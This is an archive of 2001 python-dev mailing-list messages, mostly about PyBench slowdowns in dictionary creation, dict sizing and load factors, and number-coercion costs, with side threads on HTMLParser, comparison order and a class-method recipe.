> >>>>> "TP" == Tim Peters <tim@digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than usin malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the bext performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim@digicool.com  Fri May 18 09:32:39 2001
From: tim@digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the bext performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal@lemburg.com  Fri May 18 12:36:28 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 18 12:38:39 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding out
performance issues about hot-spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least gives
some good hints at where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries are usual within the 8 slot
range. You normally have a few heavy wheight instances and 
many light wheight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 18 16:05:45 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
 <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Fri May 18 16:00:21 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benifit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake@acm.org  Fri May 18 16:12:34 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
 <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
 <20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benifit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido@digicool.com  Fri May 18 16:27:39 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
 <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
 <20010518170021.B16811@xs4all.nl>
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benifit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Fri May 18 16:36:39 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas@xs4all.net  Fri May 18 16:36:42 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benifit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@digicool.com  Fri May 18 16:49:25 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
 <004401c0dfb0$57b7df00$e46940d5@hagrid>
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
 <004401c0dfb0$57b7df00$e46940d5@hagrid>
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Fri May 18 17:57:34 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
 <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
 <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri May 18 18:37:33 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than usin malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido@digicool.com  Fri May 18 18:43:45 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
 <20010518103733.A22185@glacier.fnational.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
 <20010518103733.A22185@glacier.fnational.com>
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri May 18 19:15:59 2001
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (ie.
its O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

Its not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, a assocation table with
four entries would take on average two pointer compares to look
up a value.

  Neil


From mal@lemburg.com  Fri May 18 19:15:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 18 19:23:55 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
 <20010518111559.A22344@glacier.fnational.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
 <20010518111559.A22344@glacier.fnational.com>
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> Its not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, a assocation table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff@i2.com  Fri May 18 20:10:11 2001
From: James_Althoff@i2.com (James_Althoff@i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----
                                                                                                               
                    James Althoff                                                                              
                                         To:     python-list@python.org                                        
                    05/14/01 02:09       cc:                                                                   
                    PM                   Subject:     Re: Simulating Class (was Re: Does Python have Class     
                                         methods)(Document link: James Althoff)                                
                                                                                                               

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass
instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass
instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>,
<meta6.Class1 instance at
 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>,
<meta6.Class2 instance at
 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>


Jim


From tim.one@home.com  Fri May 18 20:26:02 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!
>From the instant you created it, PyBench became the best performance canary
we have ("canary" in the sense of bringing a bird into the coal mine with
you, because when a potentially fatal buildup of gasses occurs, the canary
will pass out before you even notice).

My point was that making a decision based solely on that PyBench happens to
create millions of dicts of exactly size 3, and relatively few of any other
size, would be crazy -- which I'm sure you understand and appreciate too.

> ...
> I found that instance dictionaries are usual within the 8 slot
> range. You normally have a few heavy wheight instances and
> many light wheight ones which only have two or three attributes
> in their instance dict.

Matches my observations too.

[on dict resize parameters]
> Why not make those parameters macros at the top of dictobject.c
> which can then be tuned to whatever the programmer needs/wants ?!

Bad idea, IMO.  If someone understands the dict implementation well enough to
be *competent* to change these without, e.g., opening a door to infinite
loops, then they already know where these parameters appear, and can change
the hardcoded #s themselves.  Thr max load factor simply wasn't intended to
be adjustable; and if it were, it would be a per-dict decision.


From tim.one@home.com  Fri May 18 20:48:33 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (ie.
> its O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.

> Its not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, a assocation
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).


From jeremy@alum.mit.edu  Fri May 18 22:07:37 2001
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctinoCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and whether their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

